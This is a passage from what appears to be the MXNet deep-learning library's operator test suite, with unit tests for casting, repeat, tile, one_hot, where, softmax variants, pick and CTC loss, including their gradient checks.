assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
if default_context().device_type == 'gpu':
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
        for in_val, model_fp32_val, np_fp32_val in zip(input_np, sym_output, expected_output):
            assert (model_fp32_val == np_fp32_val) or \
                   (np.isnan(model_fp32_val) and np.isnan(np_fp32_val)), \
                   'fp16->fp32 multicast mismatch: with input value {}, model_fp32 = {}, numpy_fp32 = {}'.format(
                       in_val, model_fp32_val, np_fp32_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
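    # Expected where() gradients: the output gradient flows to x where the condition
    # is non-zero and to y elsewhere; the condition itself receives a zero gradient.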
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
        assert same(out, expect_out)
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
        padding_mask = -1 + (blank_label == 'first')
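        # padding_mask is 0 when the blank label comes first (labels are shifted up by
        # one further below) and -1 when the blank label comes last.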
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
